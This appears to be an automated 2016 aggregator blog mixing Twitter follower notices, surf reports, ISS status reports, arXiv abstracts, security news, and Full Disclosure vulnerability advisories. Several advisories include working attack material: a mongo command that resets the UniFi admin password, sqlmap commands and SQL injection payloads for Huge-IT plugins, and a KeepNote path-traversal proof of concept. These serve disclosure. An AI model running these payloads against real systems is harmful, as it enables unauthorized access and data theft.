Latest YouTube Video

Saturday, October 1, 2016

I have a new follower on Twitter


Allocadia
Allocadia Marketing Performance Management is planning, budgeting, and analysis software built for revenue-driven marketing teams.
Vancouver, BC
http://t.co/rgiCaQSnkx
Following: 9902 - Followers: 9985

October 01, 2016 at 11:34PM via Twitter http://twitter.com/allocadia

United States set to Hand Over Control of the Internet to ICANN Today

Since the foundation of the Internet, a contract has been handed over to the United States Commerce Department under which the department had given authority to regulate the Internet. After 47 years, this contract ends tonight at midnight EDT i.e. Saturday, October 1st, 2016. If you think that the United States owns the Internet, then you're wrong. It doesn't. Founded in 1998, non-profit


from The Hacker News http://ift.tt/2dtzwWs
via IFTTT

An open letter to Sean Anonymous

Dear Sean Anonymous,. It's me, Mina Moore: your friend and Local Current Resident DJ predecessor! You've by now accepted your invitation to host ...

from Google Alert - anonymous http://ift.tt/2dg9gku
via IFTTT

The Weeknd

Commercials · Film & TV · Management · About · Contact · News. Grant Singer. The Weeknd “Starboy”. Search. Videos. No results found. News.

from Google Alert - anonymous http://ift.tt/2dknLiW
via IFTTT

Anonymous user 6b676b

Name, Anonymous user 6b676b. User since, July 5, 2016. Number of add-ons developed, 0 add-ons. Average rating of developer's add-ons, Not yet ...

from Google Alert - anonymous http://ift.tt/2dOo8oE
via IFTTT

Anonymous

... Year Entering College: 0; State of Residence: 0. Academic Background. Selectivity Index™: 46. Anonymous has not listed any extracurriculars.

from Google Alert - anonymous http://ift.tt/2cInzfX
via IFTTT

Uh oh, Yahoo! Data Breach May Have Hit Over 1 Billion Users

The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a "state-sponsored actor" in 2014, which exposed the accounts of at least 500 Million Yahoo users. But, now it seems that Yahoo has downplayed a mega data breach and triying to hide it's own security blunder. Recently the information security firm InfoArmor that analyzed


from The Hacker News http://ift.tt/2dfdXLg
via IFTTT

Ocean City, MD's surf is at least 8.6ft high

Maryland-Delaware, October 07, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 8.6ft. At 10:00 AM, surf min of 8.43ft. At 4:00 PM, surf min of 7.94ft. At 10:00 PM, surf min of 8.21ft.

Surf maximum: 9.61ft (2.93m)
Surf minimum: 8.6ft (2.62m)
Tide height: 1.47ft (0.45m)
Wind direction: ENE
Wind speed: 22.96 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Friday, September 30, 2016

Orioles move 1 game ahead of the Blue Jays for the top AL wild-card spot after 8-1 win over the Yankees (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


John Moss
Managed Services Provider offering #premier #technology products and services. We help your #business systems run faster and provide support when you need us.
ÜT: 33.859755,-83.985618
https://t.co/UZxfgyPgva
Following: 573 - Followers: 634

September 30, 2016 at 08:49PM via Twitter http://twitter.com/ilovemycomputer

via Instagram http://ift.tt/2dryKJn

[FD] CompTIA Security+ and its insecure support system

I was signed up CompTIA account with a fake name for a privacy reason. Later on, I wanted to update my name in CompTIA account because I was planning to take their Security+ certificate. The problem is I cannot update my name directly from the profile menu, it told me to create a support ticket (this is a good idea I guess).  However, the support guy asked me to upload a copy of a legal ID (driver's license or passport) to the support ticket system. The real bad thing is the CompTIA's support ticket system can be logged in by using just an "email address".  If you know email of someone who holds a CompTIA certificate, you can freely access his/her support tickets at: http://ift.tt/2cRyfr0 You can fill anything in  'first name' field. Only a valid email address is required to access anybody support ticket. So I tried to explain to them that this is not a good security practice to ask me to upload my passport to such an insecure system but the support guy cannot do anything about it. I think the Security+ certificate creators need to learn how to secure a system containing sensitive information like the copy of customer's passports with at least a pair of username and password. rgds, CISSP wannabe

Source: Gmail -> IFTTT-> Blogger

[FD] Critical Vulnerability in Ubiquiti UniFi

Hello @all, together with my colleague we found two uncritical vulnerabilities you'll find below. Product: UniFi AP AC Lite Vendor: Ubiquiti Networks Inc. Internal reference: ? (Bug ID) Vulnerability type: Incorrect access control Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested) Vulnerable component: Database Report confidence: yes Solution status: Not fixed by Vendor, the bug is a feature. Fixed versions: - Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7792 CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Details: You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section. Risk: An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below. PoC: 1. Generate SHA512 Hash with e.g. mkpasswd -m sha-512 2. Connect via network to database, e.g. : mongo --port 27117 --host target_ip 3. Change password via command "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" 4. Login via web interface with new password Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple exposures in Sophos UTM

Hello @all, together with my colleague we found two uncritical vulnerabilities you'll find below. Product: Sophos UTM Vendor: Sophos ltd. Internal reference: ? (Bug ID) Vulnerability type: Information Disclosure Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not tested) Vulnerable component: Frontend Report confidence: yes Solution status: Not fixed by Vendor, no further responses from vendor. Fixed versions: - Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks Vendor notification: 2016-09-01 Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7397 CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N Report timeline: 2016-09-01: Contacted Vendor, vendor acknowledged, no further response 2016-09-12: Contacted Vendor again, started to fix 2016-09-30: Contacted Vendor again, because there has been no response to our request and our initial told disclosing date, no response again. 2016-09-30: Public Disclosure. Vulnerability Details: The password is reflected to DOM and is readable through the "value" field of the SMTP user settings in notifications tab. You have to be authenticated to access the configuration tab. Risk: An attacker gets access to the configured mailbox. Because of Sophos UTM is a multi user system, this is a problem in bigger company environments with splitted admin rights. The surface scope is changed, because in bigger environments you are getting access to the configured mailbox, which results in an integrity loss. Steps to reproduce: See vulnerability details.

Source: Gmail -> IFTTT-> Blogger

[FD] Radioactive Mouse States the Obvious: Exploiting unencrypted and unauthenticated data communication of wireless mice

tl;dr Today, SySS published a proof-of-concept video demonstrating a mouse spoofing attack resulting in remote code execution due to insecure wireless mouse communication: https://www.youtube.com/watch?v=PkR8EODee44 --

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-061] PERIDUO-710W - Insufficient Verification of Data Authenticity (CWE-345)

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-060] Logitech M520 - Insufficient Verification of Data Authenticity (CWE-345)

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-058] CHERRY B.UNLIMITED AES - Insufficient Verification of Data Authenticity (CWE-345)

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-16 Download Site: http://ift.tt/2aFCmny Vendor: huge-it.com Vendor Notified: 2016-09-17 Vendor Contact: info@huge-it.com Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need. Vulnerability: The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php: In file ajax_url.php: 11 define('_JEXEC',1); 12 defined('_JEXEC') or die('Restircted access'); . . . 49 $page = $_POST["page"]; 50 $num=$_POST['perpage']; 51 $start = $page * $num - $num; 52 $idofgallery=$_POST['galleryid']; 53 $level = $_POST['level']; 54 $query = $db->getQuery(true); 55 $query->select('*'); 56 $query->from('#__huge_itportfolio_images'); 57 $query->where('portfolio_id ='.$idofgallery); 58 $query ->order('#__huge_itportfolio_images.ordering asc'); 59 $db->setQuery($query,$start,$num); CVE-2016-1000124 Exploit Code: • $ sqlmap -u 'http://ift.tt/2cHwqcZ' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3 • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: •

Source: Gmail -> IFTTT-> Blogger

via Instagram http://ift.tt/2d20GQW

Orioles Poll: Who's been the team MVP in 2016: Zach Britton, Kevin Gausman, Manny Machado or Mark Trumbo? Vote now! (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 09/29/2016

Group Combustion Module (GCM) Installation: FE-5 continued with the third day of installation and preparation for the GCM experiment and was to perform two pressure decay leak checks. After the first check, a leak was detected in the Air/O2 line, thus aborting the second check until specialist can determine the cause and develop a solution. The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made.  Bigelow Expandable Activity Module (BEAM): FE-6 ingressed BEAM and temporarily installed the Internal Wireless Instrumentation System (IWIS) Remote Sensing Unit (RSU) in Node 3 and the Triaxial Accelerometer (TAA) in BEAM. Following the instrument installation, FE-6 performed a modal test by imparting loads onto BEAM and measuring the acceleration throughout the module. Expandable habitats, occasionally described as inflatable habitats, greatly decrease the amount of transport volume for future space missions. These “expandables” weigh less and take up less room on a rocket while allowing additional space for living and working. They also provide protection from solar and cosmic radiation, space debris, and other contaminants. Crews traveling to the moon, Mars, asteroids, or other destinations could potentially use them as habitable structures ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight: FE-5 began the first day of the 11 day ENERGY experiment. Intended to measure an Astronaut’s Energy Requirements, ENERGY will require FE-5 to consume standardized meals today and tomorrow, in addition to diet logging over the entire 11 day duration. Today FE-5 also setup the Armband Activity Monitor which will be worn through the duration of the experiment, took water samples, and setup the oxygen uptake measurements (XTP). Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.  Today’s Planned Activities All activities are on schedule unless otherwise noted. Personal CO2 Monitor iPad Application Restart Soyuz 731 Descent Procedure Update Preparation of Reports for Roscosmos Web Site and Social Media URAGAN. Observation and photography RS Photo Cameras Sync Up to Station Time EKON-M. Observations and photography Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 1 [Cancelled] Fine Motor Skills Experiment Test – Subject Replacement ПУ-1 in АСУ Hard To Wet Sample Module Inspection Food Frequency Questionnaire (FFQ) Water Recovery System Waste Water Tank Drain Init Advanced Resistive Exercise Device (ARED) Cylinder Flywheel Evacuation Mating New Control Panel Telemetry Cable to БИТС2-12 Group Combustion Module (GCM) Experiment Laptop Terminal 2 (ELT2)  Setup Replacement ПУ-1 Control Panel in [АСУ] Water Recovery System Waste Water Tank Drain Termination MRM2 comm config to support the P/L Ops Kulonovskiy Kristall Experiment Run MRM2 Comm Reconfig for Nominal Ops KULONOVSKIY KRISTALL Habitability Human Factors Questionnaires – Subject Habitability Human Factors Directed Observations – Subject Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Remove Items in Front of N3A for Hatch Access Photo/TV N3/BEAM Camcorder Setup ARED Platform Fold Food Frequency Questionnaire (FFQ) BEAM Ingress Air sampling in BEAM module using AK-1M sampler before air duct installation Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 2 Replacement of CO2 Filter Unit ИК0501 Personal CO2 Monitor Power Cycle TAA Install in BEAM СОЖ maintenance Tape Distributed Impact Detection System (DIDS) sensors Modal Test Armband Activity Monitor Setup Progress 432 [OA] Stowage Ops with IMS Support ENERGY Water Sample Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) pressure gauge check and Valve Operations. PAO Preparation Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Energy PFS Setup Public Affairs Office (PAO) Event in High Definition (HD) – Lab Deconfigure IWIS DDS Data Download to BEAM SSC OTKLIK. Hardware Monitoring BEAM Cleanup and Egress Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Return Items Back to N3A Location That Were Removed for BEAM Ingress ARED Platform Unfold Back to Nominal Position Ghost Camera Stow INTERACTION-2. Experiment Ops Inventory Management System (IMS) Conference Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) pressure gauge check and Valve Operations. CB/ISS CREW CONFERENCE Flight Director/ISS CREW CONFERENCE Crew Choice Event Personal CO2 Monitor Power Cycle Personal CO2 Monitor Doff and Charge Completed Task List Items None  Ground Activities All activities are on schedule unless otherwise noted. Lab MCA Zero Calibration [Delayed] Three-Day Look Ahead: Friday, 09/30: Energy Experiment, PGT TAK Data Gather Saturday, 10/01: Finemotor Skills, Hard to Wet Surfaces, Energy Conclude Sunday, 10/02: Crew Off Duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Standby Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Reprocess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2dwPZei
via IFTTT

Ocean City, MD's surf is at least 13.04ft high

Maryland-Delaware, October 06, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 13.04ft. At 10:00 AM, surf min of 12.73ft. At 4:00 PM, surf min of 12.86ft. At 10:00 PM, surf min of 11.63ft.

Surf maximum: 14.05ft (4.28m)
Surf minimum: 13.04ft (3.97m)
Tide height: 1.06ft (0.32m)
Wind direction: ENE
Wind speed: 36.76 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Zerodium Offers $1.5 Million Bounty For iOS Zero-Day Exploits

Well, there's some good news for Hackers and Bug hunters, though a terrible news for Apple! Exploit vendor Zerodium has tripled its bug bounty for an Apple's iOS 10 zero-day exploit, offering a maximum payout of $US1.5 Million. Yes, $1,500,000.00 Reward. That's more than seven times what Apple is offering (up to $200,000) for iOS zero-days via its private, invite-only bug bounty program. <


from The Hacker News http://ift.tt/2drz0ED
via IFTTT

Thursday, September 29, 2016

I have a new follower on Twitter


Medical Innovation
Celebrating and promoting the promise of medical research and innovation. Principal contributor: Chris Ward
U.S.A.
https://t.co/vnoTXKK4Az
Following: 1669 - Followers: 3524

September 29, 2016 at 10:49PM via Twitter http://twitter.com/Med_Innovation

I have a new follower on Twitter


BlueBolt, Inc.
A digital agency in Chicago & Denver providing consulting services in #CRM, #Search, #Cybersecurity, #PIM, & #MarketingAutomation
Chicago, Il
http://t.co/Qo15LlPwEL
Following: 1134 - Followers: 1157

September 29, 2016 at 10:09PM via Twitter http://twitter.com/BlueBoltSol

Orioles (87-72) tie Blue Jays (87-72) for top wild card spot after 4-0 win; Ubaldo Jimenez 6.2 IP, 1 H and 5 K (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ICE: Information Credibility Evaluation on Social Media via Representation Learning. (arXiv:1609.09226v1 [cs.SI])

With the rapid growth of social media, rumors are also spreading widely on social media and bring harm to people's daily life. Nowadays, information credibility evaluation has drawn attention from academic and industrial communities. Current methods mainly focus on feature engineering and achieve some success. However, feature engineering based methods require a lot of labor and cannot fully reveal the underlying relations among data. In our viewpoint, the key elements of user behaviors for evaluating credibility are concluded as "who", "what", "when", and "how". These existing methods cannot model the correlation among different key elements during the spreading of microblogs. In this paper, we propose a novel representation learning method, Information Credibility Evaluation (ICE), to learn representations of information credibility on social media. In ICE, latent representations are learnt for modeling user credibility, behavior types, temporal properties, and comment attitudes. The aggregation of these factors in the microblog spreading process yields the representation of a user's behavior, and the aggregation of these dynamic representations generates the credibility representation of an event spreading on social media. Moreover, a pairwise learning method is applied to maximize the credibility difference between rumors and non-rumors. To evaluate the performance of ICE, we conduct experiments on a Sina Weibo data set, and the experimental results show that our ICE model outperforms the state-of-the-art methods.



from cs.AI updates on arXiv.org http://ift.tt/2ddU7h9
via IFTTT

Heuristic with elements of tabu search for Truck and Trailer Routing Problem. (arXiv:1609.09253v1 [cs.AI])

Vehicle Routing Problem is a well-known problem in logistics and transportation, and the variety of such problems is explained by the fact that it occurs in many real-life situations. It is an NP-hard combinatorial optimization problem and finding an exact optimal solution is practically impossible. In this work, Site-Dependent Truck and Trailer Routing Problem with hard and soft Time Windows and Split Deliveries is considered (SDTTRPTWSD). In this article, we develop a heuristic with the elements of Tabu Search for solving SDTTRPTWSD. The heuristic uses the concept of neighborhoods and visits infeasible solutions during the search. A greedy heuristic is applied to construct an initial solution.



from cs.AI updates on arXiv.org http://ift.tt/2ddTvYw
via IFTTT

Semantic Parsing with Semi-Supervised Sequential Autoencoders. (arXiv:1609.09315v1 [cs.CL])

We present a novel semi-supervised approach for sequence transduction and apply it to semantic parsing. The unsupervised component is based on a generative model in which latent sentences generate the unpaired logical forms. We apply this method to a number of semantic parsing tasks focusing on domains with limited access to labelled training data and extend those datasets with synthetically generated logical forms.



from cs.AI updates on arXiv.org http://ift.tt/2ddUkRm
via IFTTT

Deep Tracking on the Move: Learning to Track the World from a Moving Vehicle using Recurrent Neural Networks. (arXiv:1609.09365v1 [cs.CV])

This paper presents an end-to-end approach for tracking static and dynamic objects for an autonomous vehicle driving through crowded urban environments. Unlike traditional approaches to tracking, this method is learned end-to-end, and is able to directly predict a full unoccluded occupancy grid map from raw laser input data. Inspired by the recently presented DeepTracking approach [Ondruska, 2016], we employ a recurrent neural network (RNN) to capture the temporal evolution of the state of the environment, and propose to use Spatial Transformer modules to exploit estimates of the egomotion of the vehicle. Our results demonstrate the ability to track a range of objects, including cars, buses, pedestrians, and cyclists through occlusion, from both moving and stationary platforms, using a single learned model. Experimental results demonstrate that the model can also predict the future states of objects from current inputs, with greater accuracy than previous work.



from cs.AI updates on arXiv.org http://ift.tt/2ddU3xC
via IFTTT

Evaluating Induced CCG Parsers on Grounded Semantic Parsing. (arXiv:1609.09405v1 [cs.CL])

We compare the effectiveness of four different syntactic CCG parsers for a semantic slot-filling task to explore how much syntactic supervision is required for downstream semantic analysis. This extrinsic, task-based evaluation also provides a unique window into the semantics captured (or missed) by unsupervised grammar induction systems.



from cs.AI updates on arXiv.org http://ift.tt/2dDK0QD
via IFTTT

Contextual RNN-GANs for Abstract Reasoning Diagram Generation. (arXiv:1609.09444v1 [cs.CV])

Understanding, predicting, and generating object motions and transformations is a core problem in artificial intelligence. Modeling sequences of evolving images may provide better representations and models of motion and may ultimately be used for forecasting, simulation, or video generation. Diagrammatic Abstract Reasoning is an avenue in which diagrams evolve in complex patterns and one needs to infer the underlying pattern sequence and generate the next image in the sequence. For this, we develop a novel Contextual Generative Adversarial Network based on Recurrent Neural Networks (Context-RNN-GANs), where both the generator and the discriminator modules are based on contextual history (modeled as RNNs) and the adversarial discriminator guides the generator to produce realistic images for the particular time step in the image sequence. We evaluate the Context-RNN-GAN model (and its variants) on a novel dataset of Diagrammatic Abstract Reasoning, where it performs competitively with 10th-grade human performance but there is still scope for interesting improvements as compared to college-grade human performance. We also evaluate our model on a standard video next-frame prediction task, achieving improved performance over comparable state-of-the-art.



from cs.AI updates on arXiv.org http://ift.tt/2dDIEW0
via IFTTT

[FD] Persistent XSS in Abus Security Center - CVSS 8.0

[FD] KeepNote 0.7.8 Remote Command Execution

# Title : KeepNote 0.7.8 Remote Command Execution # Date : 29/09/2016 # Author : R-73eN # Twitter : https://twitter.com/r_73en # Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7) # Software : http://ift.tt/2dv14fQ # Vendor : ~ # # DESCRIPTION: # # When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters # which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions). # This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run. # There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application # as root (default in kali linux which this bug is tested). # #

Source: Gmail -> IFTTT-> Blogger

Associate anonymous orders to new accounts via email

While accounts can be created from anonymous order checkouts (in the last step of checkout), I propose anonymous orders should be associated to ...

from Google Alert - anonymous http://ift.tt/2duIYuf
via IFTTT

37-Year-Old 'Syrian Electronic Army' Hacker Pleads Guilty in US court

One of the FBI's Most Wanted Hackers who was arrested in Germany earlier this year has pleaded guilty to federal charges for his role in a scheme that hacked computers and targeted the US government, foreign governments, and multiple US media outlets. Peter Romar, 37, pleaded guilty Wednesday in a federal court in Alexandria to felony charges of conspiring to receive extortion proceeds and to


from The Hacker News http://ift.tt/2dpt7YA
via IFTTT

ISS Daily Summary Report – 09/28/2016

Marangoni Experiment (Dynamic Surf 3): Overnight another run of the Marangoni experiment occurred in the Fluid Physics Experiment Facility (FPEF). The Dynamic Surf investigation is part of a series of JAXA experiments studying Marangoni convection driven by the presence of surface tension gradients produced by a temperature difference at a liquid/gas interface. By observing and understanding how a silicone oil liquid bridge moves, researchers can learn about how heat is transferred in microgravity and ultimately drive the design and development of more efficient fluid flow based systems and devices.  Hard to Wet Surfaces: FE-6 performed the sample processing, setup of the Sample Module, and initiated automated photography of the samples. Throughout the day, FE-5 and FE-6 periodically remixed the samples before finally downlinking the day’s photographs and stowing the experiment. The Hard to Wet Surfaces (Eli Lilly-Hard to Wet Surfaces) investigation studies how certain materials used in the pharmaceutical industry dissolve in water while in microgravity. Results from this investigation could help improve the design of tablets that dissolve in the body to deliver drugs, thereby improving drug design for medicines used in space and on Earth. Group Combustion Module (GCM) Installation: Today, FE-5 continued with day 2 of installation and preparation for the GCM experiment. FE-5 installed the Combustion Chamber (CC) that the crew assembled yesterday and the Gas Bottle Unit (GBU) Air into the Multi-Purpose Small Payload Rack (MSPR) Work Volume. The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made. Sound Level Meter (SLM) Survey:  Today FE-6 performed SLM acoustic measurements. The Node 3 diagnostic SLM survey plan called for eight sets of measurements, encompassing various Node 3 Common Cabin Air Assembly (CCAA) fan speeds and Rheostat Air Mix Valve (RAMV) settings with the Urine Processor Assembly (UPA) Distillation Assembly (DA) and Oxygen Generation Assembly (OGA) Pump either on or off depending on the portion of the survey plan being worked, totaling 52 SLM measurements.  In addition, standard SLM measurements of the US Lab and Service Module (SM) were taken.   Today’s Planned Activities All activities were completed unless otherwise noted. Fine Motor Skills Experiment Test – Subject Hard To Wet Surfaces Sample Processing Э-NOC. Execution experiment Multi Omics FOS Stow Hard To Wet Surfaces D2Xs Battery Charge Multi Omics FOS Preparation Ghost Camera Setup for Modal Test Hard To Wet Surfaces Sample Remix. Sound Level Meter (SLM) Setup and Operations Hard To Wet Surfaces Sample Remix. ENERGY Big Picture Words Reading  ENERGY Equipment Pre-gather Strata Card Changeout Hard To Wet Surfaces Sample Remix Sound Level Meter (SLM) Data Transfer ISS air pressurization from ТГК Dose Tracker Data Entry Subject Personal CO2 Monitor Power Cycle Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Greetings Video Recording XF305 Camcorder Setup Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Install Public Affairs Office (PAO) Event in High Definition (HD) – Lab Modal Test Hardware Unstow Air Heater Fan [БВН]  64P PROGRESS checkout IWIS Install for Modal Test Group Combustion Module (GCM) Gas Bottle Unit Air (GBU) Install СОЖ maintenance Total Organic Carbon Analyzer (TOCA) Sample Data Record HARD TO WET SURFACES CAMERA RESTART Completed Task List Items JAXA Report Part 6 (Active) Ground Activities All activities were completed unless otherwise noted. N3 system reconfigurations for SLM measurements RPCM AL1A4A_B and LAD62B_A Firmware Update Three-Day Look Ahead: Thursday, 09/29: BEAM Ingress and Modal Test, Energy setup Friday, 09/30: Energy Experiment, PGT TAK Data Gather Saturday, 10/01: Finemotor Skills, Hard to Wet Surfaces, Energy Conclude  QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Reprocess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/2cEfJ6U
via IFTTT

Multiple Backdoors found in D-Link DWR-932 B LTE Router

If you own a D-Link wireless router, especially DWR-932 B LTE router, you should get rid of it, rather than wait for a firmware upgrade that never lands soon. D-Link DWR-932B LTE router is allegedly vulnerable to over 20 issues, including backdoor accounts, default credentials, leaky credentials, firmware upgrade vulnerabilities and insecure UPnP (Universal Plug-and-Play) configuration. If


from The Hacker News http://ift.tt/2dtzNKK
via IFTTT

Improve Your Online Privacy And Security Using NordVPN

Today, most users surf the web unaware of the fact that websites collect their data and track their locations – and if this is not enough, then there are hackers and cyber criminals who can easily steal sensitive data from the ill-equipped. In short, the simple truth is that you have no or very little privacy when you're online. So, if you're worried about identity thieves, or ISPs spying on


from The Hacker News http://ift.tt/2dcV4o6
via IFTTT

Ocean City, MD's surf is at least 7.9ft high

Maryland-Delaware, October 05, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 7.9ft. At 10:00 AM, surf min of 9.73ft. At 4:00 PM, surf min of 10.92ft. At 10:00 PM, surf min of 11.68ft.

Surf maximum: 8.74ft (2.67m)
Surf minimum: 7.9ft (2.41m)
Tide height: 0.67ft (0.2m)
Wind direction: ENE
Wind speed: 26.3 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-16 Download Site: http://ift.tt/2cy5GyY Vendor: huge-it.com Vendor Notified: 2016-09-17 Vendor Contact: info@huge-it.com Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC', 1); 12 defined('_JEXEC') or die('Restircted access'); . . . 308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") { 309 $catalog_id = $_POST["catalog_id"]; 310 $old_count = $_POST["old_count"]; 311 $count_into_page = $_POST["count_into_page"]; 312 $show_thumbs = $_POST["show_thumbs"]; 313 $show_description = $_POST["show_description"]; 314 $show_linkbutton = $_POST["show_linkbutton"]; 315 $parmalink = $_POST["parmalink"]; 316 $level = $_POST['level']; . . . 359 $query->select('*'); 360 $query->from('#__huge_it_catalog_products'); 361 $query->where('catalog_id =' . $catalog_id); 362 $query->order('ordering asc'); 363 $db->setQuery($query, $from, $count_into_page); CVE-2016-1000125 Exploit Code: • $ sqlmap -u 'http://ift.tt/2cMQiib' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3 • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION 